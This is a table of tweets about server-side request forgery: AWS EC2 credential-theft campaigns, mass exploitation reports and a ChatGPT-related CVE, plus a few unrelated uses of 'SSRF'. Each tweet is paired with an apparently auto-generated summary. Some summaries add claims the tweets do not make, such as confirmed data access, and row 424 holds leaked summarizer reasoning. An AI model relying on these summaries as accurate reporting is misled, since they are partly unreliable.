| 424 | 2025-04-14 17:53:39 UTC | 2. For the first tweet the summary I have to condense the main points. The key points are using AutoRepeater, DNS logging platforms, regex patterns and exploiting blind SSRF. I need to make sure it's concise and under 140 chars. #ssrf #bugbountytips | The tweet discusses using AutoRepeater, DNS logging platforms, regex patterns, and exploiting blind SSRF. The focus is on condensing key points for a concise summary under 140 characters. #ssrf #bugbountytips. |
| 425 | 2025-04-14 17:53:39 UTC | How I Auto-Discovering SSRF on Hackerone Program #ssrf #bugbountytips #bugbountytip #hackers | The content discusses a method for automatically discovering Server-Side Request Forgery (SSRF) vulnerabilities on a Hackerone program. It likely includes tips and techniques for bug bounty hunters interested in finding SSRF issues. The content may provide insights into how to identify and exploit SSRF vulnerabilities effectively. The link provided likely leads to more detailed information on the topic. |
| 426 | 2025-04-14 10:53:46 UTC | New critical SSRF vulnerability (CVE-2025-3572) discovered in INTUMIT SmartRobot. No auth required, internal networks at risk. Patch now. #CyberSecurity #SSRF #Infosec #CVE20253572 | A new critical SSRF vulnerability (CVE-2025-3572) has been found in INTUMIT SmartRobot, putting internal networks at risk without authentication. It is advised to patch the vulnerability immediately to prevent potential cyber threats. The discovery highlights the importance of cybersecurity measures and staying informed about vulnerabilities like SSRF. #CyberSecurity #SSRF #Infosec #CVE20253572. |
| 427 | 2025-04-13 14:48:47 UTC | Dr Stefano Cattaneo did a great job presenting #SSRF guidelines - and even mentioned his prior scapula training by #CWIS expert @peter_a_cole! Amazing! @estesonline #ECTES2025 | Dr. Stefano Cattaneo presented #SSRF guidelines and highlighted his prior scapula training by #CWIS expert Peter A. Cole. The presentation was well-received at the @estesonline #ECTES2025 event. |
| 428 | 2025-04-11 14:38:27 UTC | A recent campaign exploited #SSRF #vulnerabilities in EC2-hosted websites to access EC2 Metadata, potentially exposing IAM credentials. This could lead to unauthorized access to S3 buckets and other #AWS services. #ThreatIntelligence #CyberSecurity | A recent campaign exploited #SSRF vulnerabilities in EC2-hosted websites to access EC2 Metadata, potentially exposing IAM credentials. This could lead to unauthorized access to S3 buckets and other AWS services. The exploitation highlights a significant security risk and emphasizes the importance of addressing vulnerabilities promptly to prevent unauthorized access and potential data breaches. #ThreatIntelligence #CyberSecurity. |
| 429 | 2025-04-11 11:43:17 UTC | Just crushed the #SSRF module on @TryHackMe! Eager to dive into #cybersecurity as an intern. If anyone's got a chance for a passionate learner I'm all in! #internship #pentesting #hacking | The content highlights the completion of the SSRF module on TryHackMe and expresses eagerness to pursue cybersecurity as an intern. The individual is enthusiastic about learning and seeking opportunities in penetration testing and hacking. They are open to internships and eager to grow in the field. |
| 430 | 2025-04-11 08:38:09 UTC | A recent SSRF attack campaign targeted Amazon EC2 instance metadata via unsecured websites aiming to steal sensitive IAM credentials, via Laura French on SC Media #aws #AWSCloud #EC2 #SSRF #CyberSecurity #IAM #IMDSv2 | A recent SSRF attack campaign focused on accessing Amazon EC2 instance metadata through unsecured websites to steal sensitive IAM credentials. The attack aimed to exploit vulnerabilities in AWS services, highlighting the importance of cybersecurity measures like IMDSv2. The incident underscores the ongoing threat of SSRF attacks and the need for vigilance in protecting cloud resources. |
| 431 | 2025-04-10 23:31:41 UTC | Amazon EC2 instance metadata targeted in SSRF attacks | Amazon EC2 instance metadata is being targeted in Server-Side Request Forgery (SSRF) attacks. This vulnerability allows attackers to access sensitive information stored in the instance metadata, potentially leading to data breaches or unauthorized access. It is crucial for users to implement security measures to protect against SSRF attacks, such as restricting access to the instance metadata and regularly updating security configurations. |
| 432 | 2025-04-10 20:38:27 UTC | #Hackers target a number of #SSRF bugs in #EC2-hosted sites to steal #AWS credentials. #Cybersecurity #infosec #cybercrime | Hackers are exploiting SSRF vulnerabilities in EC2-hosted sites to steal AWS credentials, posing a cybersecurity threat. This cybercrime trend highlights the importance of addressing security flaws in cloud services to protect sensitive information. |
| 433 | 2025-04-10 16:38:27 UTC | Hackers Target SSRF Vulnerabilities in EC2-Hosted Websites to Steal AWS Credentials ciberninjas.com/hackers-apunta #SSRF #AWS #EC2 #Ciberseguridad #Hackers #Vulnerabilidades #RoboDeCredenciales #SeguridadWeb #CloudSecurity #CiberAmenazas | Hackers are targeting SSRF vulnerabilities in websites hosted on EC2 to steal AWS credentials. The focus is on cybersecurity, hackers, vulnerabilities, credential theft, web security, cloud security, and cyber threats. The link provided likely offers more details on this issue. |
| 434 | 2025-04-10 13:46:13 UTC | Hackers attempted to steal AWS credentials using SSRF flaws within hosted sites | Hackers targeted AWS credentials through SSRF vulnerabilities in hosted websites. The attackers exploited these flaws to try and gain access to sensitive AWS credentials. SSRF flaws allowed the hackers to manipulate the server into making unauthorized requests, potentially leading to data breaches or unauthorized access to AWS resources. This incident highlights the importance of securing websites against SSRF vulnerabilities to prevent unauthorized access and protect sensitive data stored on cloud platforms like AWS. |
| 435 | 2025-04-10 11:38:09 UTC | AWS EC2 instances under fire! New F5 Labs research reveals a targeted SSRF campaign exploiting EC2 Metadata to steal IAM credentials. Is your cloud setup secure? Time to check your defenses! #CloudSecurity #SSRF #AWS | New F5 Labs research uncovers a targeted SSRF campaign exploiting AWS EC2 Metadata to steal IAM credentials, raising concerns about cloud security. Users are urged to assess their defenses to safeguard against potential threats. #CloudSecurity #SSRF #AWS |
| 436 | 2025-04-10 08:33:16 UTC | Clear Life Obstacles: Mantra for Family and Finance with Sadguru Cyriaque Vallee ( April 10 9:30 PM ) #LCDLFAllStars #Survivor2025 #Bayburt #SEVENTEEN #AshleyOgle #SanatanSanstha #SSRF #mahavirjayanti2025 #ChantingMeditation #SpiritualGrowth | Join Sadguru Cyriaque Vallee on April 10 at 9:30 PM for a session on clearing life obstacles with mantras for family and finance. The event focuses on spiritual growth through chanting meditation. Use hashtags like #LCDLFAllStars and #Survivor2025 to engage with the event. |
| 437 | 2025-04-10 00:33:58 UTC | #Hackers #target #SSRF #Bugs in #EC2-#Hosted #sites to #steal #AWS #credentials | Hackers are exploiting Server-Side Request Forgery (SSRF) bugs in EC2-hosted websites to access and steal AWS credentials. This vulnerability allows attackers to manipulate a web application's requests to access internal resources, potentially leading to data breaches or unauthorized access to sensitive information stored on AWS. Organizations hosting websites on EC2 instances should be vigilant in monitoring and patching vulnerabilities to prevent unauthorized access and protect their AWS credentials from being compromised. |
| 438 | 2025-04-10 00:33:57 UTC | Hackers target SSRF bugs in EC2 hosted sites to steal AWS credentials. Protect your AWS environment: #cybersecurity #SSRF #AWS #AWSsecurity | Hackers are exploiting Server-Side Request Forgery (SSRF) vulnerabilities in EC2 hosted sites to steal AWS credentials. It is crucial to safeguard your AWS environment against such attacks by implementing robust cybersecurity measures. Stay vigilant and prioritize AWS security to prevent unauthorized access and protect sensitive data. #cybersecurity #SSRF #AWS #AWSsecurity |
| 439 | 2025-04-09 22:11:18 UTC | Hackers target SSRF bugs in EC2-hosted sites to steal AWS credentials | Hackers are exploiting Server-Side Request Forgery (SSRF) vulnerabilities in Amazon EC2-hosted websites to steal AWS credentials. SSRF bugs allow attackers to send requests from the server to other internal resources, potentially accessing sensitive information like AWS credentials. This type of attack poses a significant risk to organizations hosting their sites on EC2 instances. It is crucial for website owners to regularly update and secure their systems to prevent such attacks and protect their AWS credentials from being compromised. |
| 440 | 2025-04-09 21:33:23 UTC | Hackers target #SSRF bugs in #EC2-hosted sites to steal #AWS credentials scyscan.com/news/hackers-t | Hackers are exploiting Server-Side Request Forgery (SSRF) vulnerabilities in Amazon EC2-hosted websites to steal AWS credentials. This security threat allows hackers to manipulate a server into making unauthorized requests, potentially leading to data breaches or unauthorized access. It is crucial for EC2-hosted sites to address and patch these vulnerabilities to prevent the theft of AWS credentials and protect sensitive information. |
| 441 | 2025-04-09 05:28:18 UTC | New Writeup Alert! "Pentathon 2025 Web Challenge - Unblocker" by Vedant Pillai is now live on IW! Check it out here: #ssrf #ctfwriteup #cybersecurity #ethicalhacking #ctf | A new writeup titled "Pentathon 2025 Web Challenge — Unblocker" by Vedant Pillai is available on IW. The writeup focuses on cybersecurity topics such as SSRF, ethical hacking, and CTF. Readers are encouraged to check it out for insights into these areas. The link provided directs to the content for further exploration. |
| 442 | 2025-04-07 13:28:30 UTC | Understand What is Server Side Request Forgery (SSRF). Cover its all types impact and How to Defend Against Server-Side Request Forgery? #SSRF #SSRFAttacks #SoftwareSecurity | The content discusses Server-Side Request Forgery (SSRF), explaining its types, impact, and defense strategies. It aims to raise awareness about SSRF attacks and the importance of software security. The focus is on understanding the threat posed by SSRF, its potential impacts, and ways to protect against such vulnerabilities. The content encourages readers to be vigilant and take proactive measures to defend their systems against SSRF attacks. |
| 443 | 2025-04-07 11:28:39 UTC | Critical CVE-2025-32013 alert: An SSRF flaw in LNbits could expose internal systems via manipulated callback URLs. CVSS 9.3. Immediate action is advised. Details: threatsbank.com/critical-ssrf- #CyberSecurity #CVE2025 #SSRF #LNbits | A critical CVE-2025-32013 alert warns of an SSRF flaw in LNbits that could expose internal systems through manipulated callback URLs, with a CVSS score of 9.3. Immediate action is recommended. For more details, visit threatsbank.com/critical-ssrf-. #CyberSecurity #CVE2025 #SSRF #LNbits. |
| 444 | 2025-04-06 05:13:37 UTC | SSRF Cloud token theft Full cloud compromise. #BugBounty #CloudSecurity #SSRF #EthicalHacking | The content discusses a security vulnerability known as Server-Side Request Forgery (SSRF) that can lead to cloud token theft and full cloud compromise. It emphasizes the importance of Bug Bounty programs, Cloud Security, SSRF awareness, and Ethical Hacking practices to address and prevent such vulnerabilities. The content aims to raise awareness about the risks associated with SSRF and the potential impact on cloud security. |
| 445 | 2025-04-05 21:13:33 UTC | Cultivating a new bash script that handles custom SSRF Payloads, User Agents and Content types for testing SSRF Injections! Full version should be on my GitHub by end of the week! #hack #hackers #Hackingtime #Pentesting #SSRF #BugBounty #cybersec | A new bash script is being developed to handle custom SSRF payloads, user agents, and content types for testing SSRF injections. The full version will be available on GitHub by the end of the week. The project aims to assist in testing SSRF vulnerabilities and is relevant to hacking, pentesting, bug bounty, and cybersecurity communities. #hack #hackers #Hackingtime #Pentesting #SSRF #BugBounty #cybersec. |
| 446 | 2025-04-05 12:13:20 UTC | New Writeup Alert! "SSRF to RCE: How I Turned a Small Bug Into a Big Paycheck" by Abhijeet Kumawat is now live on IW! Check it out here: infosecwriteups.com/574b6b889d2a #hacking #ssrf #rce #bugbounty #cybersecurity | Abhijeet Kumawat's new writeup on turning a small bug into a big paycheck through SSRF to RCE is now available on IW. The content discusses hacking, SSRF, RCE, bug bounty, and cybersecurity. Readers can find the detailed writeup at infosecwriteups.com/574b6b889d2a. |
| 447 | 2025-04-04 21:08:28 UTC | A message from our CEO @DRtheNerd: #SSRF attacks are highly advanced but with #ZeroTrust implementations threat actors are ensured to be denied access into servers. Learn how ADAMnetworks implements Zero Trust measures to detect these risks: bit.ly/3KpoIXc | The CEO highlights the sophistication of SSRF attacks but emphasizes that Zero Trust measures can prevent access to servers. ADAMnetworks implements Zero Trust to detect these risks effectively. The message underscores the importance of Zero Trust in cybersecurity to counter advanced threats like SSRF attacks. The provided link likely offers more details on how ADAMnetworks utilizes Zero Trust to enhance security measures. |
| 448 | 2025-03-31 16:58:44 UTC | Security warning: exploitation of SSRF vulnerabilities is on the rise! GreyNoise reveals an increase in attacks via servers, reaching 400 active IP addresses. The attacks target technology companies and increase the risk of data leaks. How you are affected and how to protect yourself, guidance and details: #الأمن_السيبراني #SSRF | GreyNoise reports a rise in SSRF vulnerabilities exploitation, with attacks targeting tech companies and posing data leakage risks. Up to 400 active IP addresses are involved. Guidance on how these attacks impact and how to protect oneself is provided. The content emphasizes cybersecurity awareness and protection against SSRF threats. |
| 449 | 2025-03-30 09:48:49 UTC | I just published Day 8 API-072023 Server Side Request Forgery #CyberSecurity #SSRF #APISecurity #OWASP #ThreatIntelligence #Infosec #BugBounty #API7 #CyberDefense #SecurityBestPractices #TechBlog #CyberAwareness #DigitalForensics #IncidentResponse | The content is about a publication on Day 8 API-07-2023 focusing on Server Side Request Forgery in the context of cybersecurity. The post includes hashtags related to cybersecurity topics such as SSRF, APISecurity, OWASP, ThreatIntelligence, Infosec, BugBounty, CyberDefense, SecurityBestPractices, TechBlog, CyberAwareness, DigitalForensics, and IncidentResponse. The link provided directs to the published content. |
| 450 | 2025-03-28 23:43:32 UTC | #ServerSideRequestForgery (#SSRF) is a critical web app #vulnerability that can compromise your systems. Attackers can exploit it to gain unauthorized access to internal networks, potentially exposing sensitive data or executing malicious code. cybernewslive.com/server-side-re | #ServerSideRequestForgery (#SSRF) is a dangerous web app vulnerability that allows attackers to access internal networks, potentially leading to data exposure or malicious code execution. This vulnerability can compromise systems and must be addressed to prevent unauthorized access and protect sensitive information. Cybersecurity measures are crucial to mitigate the risks associated with SSRF attacks. |
| 451 | 2025-03-28 05:38:23 UTC | #Cycatz #cybersecurity SSRF Leads to RCE More... shorturl.at/i4LG8 #cyberattacksurfacemanagement #darkwebmonitoring #SurfaceWebMonitoring #mobilesecurity #mailsecurity #cloudsecurity #grc #riskregister #vendorriskmanagement #brandmonitoring #incedentreport #bug #SSRF #RCE | The content discusses cybersecurity topics such as SSRF leading to RCE, cyber attack surface management, dark web monitoring, mobile security, cloud security, risk management, vendor risk, brand monitoring, incident reporting, and bugs. It emphasizes the importance of these areas in maintaining security and preventing cyber threats. The link provided likely leads to further information on these topics. |
| 452 | 2025-03-27 06:33:37 UTC | Server-Side Request Forgery (SSRF) is often underestimated but it can lead to severe consequences, including Remote Code Execution (RCE). Read here: #CyberSecurity #SSRF #RCE #EthicalHacking #hackingtips | Server-Side Request Forgery (SSRF) is a serious security threat that is often underestimated. It can result in severe consequences, such as Remote Code Execution (RCE). This highlights the importance of understanding and addressing SSRF vulnerabilities to prevent potential cyber attacks. The content emphasizes the significance of cybersecurity, SSRF, RCE, ethical hacking, and provides hacking tips. |
| 453 | 2025-03-25 11:26:11 UTC | Positive Technologies helps fix a vulnerability in Veeam Service Provider Console | Positive Technologies assisted in addressing a vulnerability found in the Veeam Service Provider Console. The vulnerability was identified and resolved with the help of Positive Technologies. The collaboration between the two entities resulted in fixing the security flaw in the Veeam Service Provider Console. |
| 454 | 2025-03-24 15:23:54 UTC | New Writeup Alert! "SSRF Advanced Methodology" by Abhijeet Kumawat is now live on IW! Check it out here: #hacking #bugbounty #methodology #ssrf #infosec | Abhijeet Kumawat's new writeup "SSRF Advanced Methodology" is now available on IW, focusing on hacking, bug bounty, methodology, SSRF, and infosec. The content provides insights into advanced SSRF techniques. Readers interested in cybersecurity and exploiting SSRF vulnerabilities can find valuable information in this writeup. |
| 455 | 2025-03-24 00:18:46 UTC | 2024 CWE Top 25 Most #Dangerous_Software_Weaknesses: #Server_Side_Request_Forgery #SSRF CWE-918 | The content discusses the 2024 CWE Top 25 Most Dangerous Software Weaknesses, highlighting Server Side Request Forgery (SSRF) as a critical vulnerability (CWE-918). This weakness can allow attackers to manipulate server requests, potentially leading to unauthorized access or data leaks. Organizations should prioritize addressing SSRF vulnerabilities to enhance their cybersecurity defenses. |
| 456 | 2025-03-24 00:18:45 UTC | 2024 CWE Top 25 Most #Dangerous_Software_Weaknesses: #Server_Side_Request_Forgery #SSRF CWE-918 | The content discusses the 2024 CWE Top 25 Most Dangerous Software Weaknesses, highlighting Server-Side Request Forgery (SSRF) as a critical vulnerability (CWE-918). This weakness can allow attackers to manipulate server requests, potentially leading to unauthorized access or data leakage. Organizations should prioritize addressing SSRF vulnerabilities to enhance their cybersecurity defenses and protect sensitive information from exploitation. |
| 457 | 2025-03-23 18:18:46 UTC | When you see payloads like this with URL the next thing to look out for (vulnerability) should be #SSRF Don't ignore the signs. | The content highlights the importance of being cautious when encountering payloads with URLs, suggesting that the next vulnerability to watch for is Server-Side Request Forgery (SSRF). It emphasizes not ignoring such signs to prevent potential security risks. The provided URL example serves as a reminder to be vigilant and proactive in identifying and addressing vulnerabilities like SSRF. |
| 458 | 2025-03-21 22:13:13 UTC | Big warning from GreyNoise: Over 400 IPs exploiting SSRF vulnerabilities in GitLab, VMware and more. Patch up, monitor traffic and stay vigilant! #CyberSecurity #SSRF #ThreatIntelligence #PatchNow | GreyNoise issued a warning about 400+ IPs exploiting SSRF vulnerabilities in GitLab, VMware, and other systems. They advise patching up vulnerabilities, monitoring traffic, and staying vigilant for potential threats. This highlights the importance of cybersecurity measures and prompt patching to mitigate risks. #CyberSecurity #SSRF #ThreatIntelligence #PatchNow |
| 459 | 2025-03-21 10:08:35 UTC | @starkcharry I've confirmed HTTP interactions on a blind SSRF in a BBP target and exploring escalation to RCE. Since you've shared great insights on SSRF exploitation before I'd love to collaborate on this. Let me know if you're interested! #BugBounty #SSRF #Pentesting | The content mentions confirming HTTP interactions on a blind SSRF vulnerability in a BBP target and exploring escalation to Remote Code Execution (RCE). The author seeks collaboration with @starkcharry, who has expertise in SSRF exploitation. They express interest in working together on this and invite @starkcharry to join. The post includes relevant hashtags like #BugBounty, #SSRF, and #Pentesting. |
| 460 | 2025-03-20 23:36:12 UTC | Hackers Are Using ChatGPT Bug to Access Sensitive Data | Hackers are exploiting a bug in ChatGPT to gain access to sensitive data. The bug is being used to breach security measures and extract confidential information. This vulnerability poses a significant threat to privacy and data security. It is crucial for users and developers to be aware of this issue and take necessary precautions to protect their data from potential breaches. |
| 461 | 2025-03-20 12:21:23 UTC | ChatGPT Vulnerability Exploited Against US Government Organizations | The ChatGPT vulnerability was exploited against US government organizations. The details of the exploit and its impact are not provided in the summary. |
| 462 | 2025-03-20 05:03:12 UTC | Over 400 IPs exploiting SSRF vulnerabilities like CVE-2020-7796 & CVE-2021-22175. Patch up, monitor traffic and stay vigilant! #CyberSecurity #SSRF #ThreatIntelligence #PatchNow | Over 400 IPs are exploiting SSRF vulnerabilities such as CVE-2020-7796 & CVE-2021-22175. It is crucial to patch up systems, monitor traffic, and remain vigilant to prevent cyber threats. The post emphasizes the importance of cybersecurity, threat intelligence, and immediate patching to address these vulnerabilities. Stay proactive and protect your systems. #CyberSecurity #SSRF #ThreatIntelligence #PatchNow. |
| 463 | 2025-03-19 21:51:18 UTC | US Primarily Targeted By Attacks Leveraging ChatGPT Vulnerability | The United States is the main target of cyber attacks exploiting vulnerabilities in ChatGPT technology. This vulnerability poses a significant risk to US entities and individuals. The attacks are specifically designed to exploit weaknesses in ChatGPT, a popular chatbot technology. It is crucial for US organizations and users to be vigilant and take necessary precautions to protect themselves from potential cyber threats leveraging this vulnerability. |
| 464 | 2025-03-19 19:03:28 UTC | #ThreatProtection #CVE-2024-27564 - #ChatGPT commit f9f4bbc #SSRF #vulnerability exploited in the wild read more about Symantec's protection: broadcom.com/support/securi | The content highlights a specific vulnerability (#CVE-2024-27564) in the #ChatGPT software, related to Server-Side Request Forgery (#SSRF), being exploited in the wild. It directs readers to learn more about Symantec's protection against this vulnerability on broadcom.com/support/securi. The post emphasizes the importance of threat protection and staying informed about potential security risks. |
465 | 2025-03-19 19:03:27 UTC | Check those common parameters could be vulnerable SSRF... For more follow ...DarkShadow... #ssrf #bugbountytips | The content discusses the importance of checking common parameters for potential SSRF vulnerabilities. It suggests following DarkShadow for more insights and tips related to SSRF and bug bounty hunting. The post emphasizes the significance of being vigilant about common parameters to identify and address SSRF vulnerabilities effectively.
466 | 2025-03-19 14:41:35 UTC | Actively Exploited ChatGPT Bug Puts Organizations at Risk | A critical bug in ChatGPT is being exploited, posing risks to organizations. The bug is actively targeted, potentially leading to security breaches. Organizations using ChatGPT should be cautious and take immediate action to mitigate the threat.
467 | 2025-03-19 11:58:42 UTC | #ChatGPT #SSRF #Vulnerabilities #bug quickly becomes a favorite #attack_vector vapt.me/GPT-SSRF | The content discusses the emergence of a vulnerability in #ChatGPT related to Server-Side Request Forgery (#SSRF), which has become a popular attack vector. The link provided likely leads to more details about this vulnerability and its implications.
468 | 2025-03-19 10:03:10 UTC | #AI: A year-old Server-Side Request Forgery (#SSRF) vulnerability in #ChatGPT pictureproxy.php file (CVE-2024-27564) is actively exploited against financial entities & government organisations; | A Server-Side Request Forgery (SSRF) vulnerability in the ChatGPT pictureproxy.php file (CVE-2024-27564) is being actively exploited against financial entities and government organizations. This year-old vulnerability poses a security risk and is being used maliciously. More information can be found at the provided link.
469 | 2025-03-19 05:01:35 UTC | Hackers Exploit ChatGPT with CVE-2024-27564 10000 Attacks in a Week | Hackers have targeted ChatGPT using CVE-2024-27564, launching over 10,000 attacks within a week. This vulnerability has been exploited by hackers to compromise the system. The attacks on ChatGPT highlight the importance of addressing security vulnerabilities promptly to prevent unauthorized access and data breaches.
470 | 2025-03-19 00:53:36 UTC | ChatGPT SSRF bug rapidly becomes an attack target. ChatGPT SSRF bug quickly becomes a favorite attack vector #BleepingComputer (Mar 18) It is reported that the ChatGPT SSRF vulnerability CVE-2024-27564 is being used in attacks against financial institutions and US government agencies. #ChatGPT記事要約 #SSRF #ChatGPT脆弱性 | The ChatGPT SSRF bug (CVE-2024-27564) is being exploited in attacks against financial institutions and US government agencies. This vulnerability has quickly become a popular attack vector. Reports indicate that the vulnerability is actively being used for malicious purposes. #SSRF #ChatGPT脆弱性
471 | 2025-03-18 16:52:04 UTC | ChatGPT SSRF bug quickly becomes a favorite attack vector | The ChatGPT SSRF bug has become a popular attack vector due to its vulnerability. SSRF (Server-Side Request Forgery) allows attackers to make requests from a server, potentially accessing sensitive information or executing malicious actions. This bug's exploitation poses a significant security risk, making it a favorite target for attackers seeking unauthorized access to systems.
472 | 2025-03-18 15:58:20 UTC | @VeritiSecurity #ChatGPT #SSRF bug quickly becomes a favorite attack vector #securityaffairs #hacking #malware | The @VeritiSecurity #ChatGPT #SSRF bug has gained popularity as an attack vector in the realm of security affairs, hacking, and malware. This vulnerability is being exploited by malicious actors, highlighting the importance of addressing and mitigating such security risks promptly.
473 | 2025-03-18 15:58:19 UTC | #ChatGPT #SSRF bug quickly becomes a favorite attack vector #securityaffairs #hacking #malware | The #ChatGPT #SSRF bug has emerged as a popular attack method in the cybersecurity realm. This vulnerability is gaining traction among hackers and malware creators. The bug's exploitation poses a significant threat to security, making it a favored attack vector. The issue is being discussed within the cybersecurity community, highlighting the importance of addressing and mitigating this vulnerability promptly.
474 | 2025-03-18 14:21:47 UTC | ChatGPT Vulnerability Actively Exploited From 10000 IPs to Attack US Government Organizations | A vulnerability in ChatGPT was exploited by over 10,000 IP addresses to launch attacks on US government organizations. The breach allowed unauthorized access to sensitive information, posing a significant security threat. The incident highlights the importance of addressing vulnerabilities promptly to prevent malicious exploitation and protect critical systems from cyber attacks.
475 | 2025-03-18 13:07:13 UTC | Hackers Exploit SSRF Vulnerability to Attack OpenAI's ChatGPT Infrastructure | Hackers targeted OpenAI's ChatGPT infrastructure by exploiting a Server-Side Request Forgery (SSRF) vulnerability. This vulnerability allowed attackers to manipulate the server into making requests on their behalf, potentially leading to unauthorized access or data theft. The attack highlights the importance of addressing and securing SSRF vulnerabilities to protect sensitive systems and data from malicious exploitation.
476 | 2025-03-18 03:48:38 UTC | New CWIS Research Alert! When should acute surgical stabilization of rib fractures be considered? Latest review explores key indications & timing to improve outcomes in rib fracture management. Read more here: pubmed.ncbi.nlm.nih.gov/40079510/ #CWISmemberresearch #SSRF | A new CWIS research review discusses the indications and timing for acute surgical stabilization of rib fractures to enhance outcomes in rib fracture management. The study aims to provide insights on when this intervention should be considered. For more details, the full review can be accessed at pubmed.ncbi.nlm.nih.gov/40079510/. #CWISmemberresearch #SSRF
477 | 2025-03-14 09:38:30 UTC | Experts warn of a "coordinated surge" in the exploitation attempts of #SSRF flaws securityaffairs.com/175344/hacking #securityaffairs #hacking | Security experts are cautioning about a significant increase in coordinated exploitation attempts targeting #SSRF flaws. This surge poses a heightened risk to systems vulnerable to these security weaknesses. The warning highlights the importance of addressing and patching these vulnerabilities promptly to prevent potential security breaches and unauthorized access to sensitive information.
478 | 2025-03-14 01:34:11 UTC | Experts warn of a coordinated surge in SSRF exploitation attempts with around 400 IPs targeting multiple vulnerabilities across platforms highlighting a concerning trend in reconnaissance-driven attacks. #CyberSecurity #SSRF | Experts are cautioning about a rise in SSRF exploitation attempts involving 400 IPs targeting various vulnerabilities across platforms, indicating a troubling trend in reconnaissance-driven attacks. This highlights the importance of cybersecurity measures to prevent such threats. #CyberSecurity #SSRF
479 | 2025-03-13 15:47:04 UTC | Experts warn of a coordinated surge in the exploitation attempts of SSRF vulnerabilities | Experts are cautioning about a rise in coordinated exploitation attempts targeting SSRF vulnerabilities. This warning highlights the increasing threat posed by attackers who are actively seeking to exploit these vulnerabilities. It underscores the importance of addressing and securing SSRF vulnerabilities to prevent potential breaches and protect systems from malicious activities.
480 | 2025-03-13 15:33:25 UTC | @GreyNoiseIO Experts warn of a "coordinated surge" in the exploitation attempts of #SSRF flaws #securityaffairs #hacking | Experts from GreyNoiseIO have issued a warning about a coordinated surge in exploitation attempts targeting SSRF flaws. This poses a significant risk to security, as SSRF vulnerabilities can be exploited by hackers for malicious activities. The increase in these exploitation attempts highlights the importance of addressing and patching SSRF vulnerabilities to protect against potential security breaches.
481 | 2025-03-13 15:33:24 UTC | Experts warn of a "coordinated surge" in the exploitation attempts of #SSRF flaws #securityaffairs #hacking | Security experts are cautioning about a notable increase in coordinated exploitation attempts targeting Server-Side Request Forgery (SSRF) vulnerabilities. This surge in attacks poses a significant threat to cybersecurity. The warning highlights the importance of addressing and patching SSRF flaws promptly to prevent potential security breaches and hacking incidents.
482 | 2025-03-13 14:31:40 UTC | Multiple SSRF vulnerabilities leveraged in far-reaching coordinated attack | The content discusses a significant cybersecurity threat involving multiple Server-Side Request Forgery (SSRF) vulnerabilities being exploited in a coordinated attack. This attack has far-reaching implications and highlights the importance of addressing and patching SSRF vulnerabilities to prevent unauthorized access to sensitive information or systems. It underscores the need for organizations to prioritize cybersecurity measures and stay vigilant against such threats to safeguard their digital assets and data.
483 | 2025-03-13 13:33:44 UTC | Over 400 IPs Exploiting Multiple SSRF Vulnerabilities in a Coordinated Cyber Attack! Read the full report: #CyberSecurity #SSRF #Hacking #CloudSecurity #CyberThreats #DataBreach #InfoSec #CyberAttack #NetworkSecurity #EthicalHacking | Over 400 IPs are involved in a coordinated cyber attack exploiting multiple SSRF vulnerabilities. The full report provides details on this cybersecurity threat, covering topics like hacking, cloud security, data breaches, network security, and ethical hacking. The attack highlights the importance of addressing vulnerabilities and enhancing cybersecurity measures to protect against cyber threats.
484 | 2025-03-13 10:46:51 UTC | OpenAI Under Attack: CVE-2024-27564 Actively Exploited in the Wild | OpenAI is facing an active cyber attack through CVE-2024-27564, which is being exploited in the wild. The vulnerability poses a significant threat to OpenAI's systems and data security. It is crucial for OpenAI to address this issue promptly to prevent further exploitation and potential damage. Vigilance and immediate action are necessary to mitigate the risks associated with this ongoing attack.
485 | 2025-03-13 08:33:43 UTC | Coordinated surge in SSRF attacks detected with over 400 IPs exploiting multiple vulnerabilities simultaneously. Organizations urged to strengthen defenses. #CyberCode #SSRF #ThreatAlert | A coordinated surge in SSRF attacks involving over 400 IPs exploiting multiple vulnerabilities simultaneously has been detected. Organizations are advised to enhance their defenses against these threats. The alert emphasizes the importance of strengthening cybersecurity measures to mitigate risks associated with SSRF attacks. #CyberCode #SSRF #ThreatAlert.
486 | 2025-03-13 06:33:35 UTC | Over 400 #IPs #Exploiting Multiple #SSRF #Vulnerabilities in Coordinated #Cyber_Attack | The content discusses a coordinated cyber attack involving over 400 IPs exploiting multiple Server-Side Request Forgery (SSRF) vulnerabilities. This attack highlights the importance of addressing and patching vulnerabilities to prevent such incidents.
487 | 2025-03-13 02:28:26 UTC | Over 400 IPs are exploiting SSRF vulnerabilities in a coordinated cyber attack warns GreyNoise. Stay informed on these threats! #CyberSecurity #SSRF #ThreatIntel | GreyNoise has identified over 400 IPs exploiting SSRF vulnerabilities in a coordinated cyber attack. This highlights a significant threat to cybersecurity. It is crucial to stay informed about these threats to protect against potential attacks. The warning emphasizes the importance of monitoring and addressing SSRF vulnerabilities to enhance cybersecurity defenses. #CyberSecurity #SSRF #ThreatIntel.
488 | 2025-03-12 21:11:07 UTC | SSRF Exploitation Surge Highlights Evolving Cyberthreats | The content discusses the increasing prevalence of Server-Side Request Forgery (SSRF) exploitation as a significant cyber threat. SSRF attacks allow hackers to manipulate a server into making unauthorized requests, potentially leading to data breaches or system compromise. This surge in SSRF exploitation underscores the evolving nature of cyber threats and the need for robust security measures to protect against such vulnerabilities.
489 | 2025-03-12 14:28:18 UTC | infosecbulletin.com/400-ips-exploi #infosecbulletin #ssrf | The content shared is a link to a webpage discussing the exploitation of 400 IPs, related to security vulnerabilities known as Server-Side Request Forgery (SSRF). The link provided seems to offer more details or insights on this topic. The hashtags #infosecbulletin and #ssrf suggest that the content is related to information security bulletins and SSRF vulnerabilities.
490 | 2025-03-12 13:29:03 UTC | Over 400 IPs Exploiting #Multiple #SSRF #Vulnerabilities in Coordinated Cyber Attack scyscan.com/news/over-400- | Over 400 IPs are exploiting multiple Server-Side Request Forgery (SSRF) vulnerabilities in a coordinated cyber attack. The attack is significant and concerning, as SSRF vulnerabilities can be used to manipulate server requests and potentially access sensitive information or systems. The source of this information is scyscan.com/news.
491 | 2025-03-12 12:28:53 UTC | OVER 400 IPS EXPLOITING MULTIPLE SSRF VULNERABILITIES IN COORDINATED CYBER ATTACK #SamirNews #mais #de #400 #ips #explorando #várias #vulnerabilidades #ssrf #em #ataque #cibernético #coordenado | Over 400 IPs are exploiting multiple SSRF vulnerabilities in a coordinated cyber attack. The attack is significant and coordinated, targeting various vulnerabilities. The content is related to cybersecurity and highlights the exploitation of SSRF vulnerabilities by a large number of IPs. The post includes hashtags like #SamirNews and provides a link for more information.
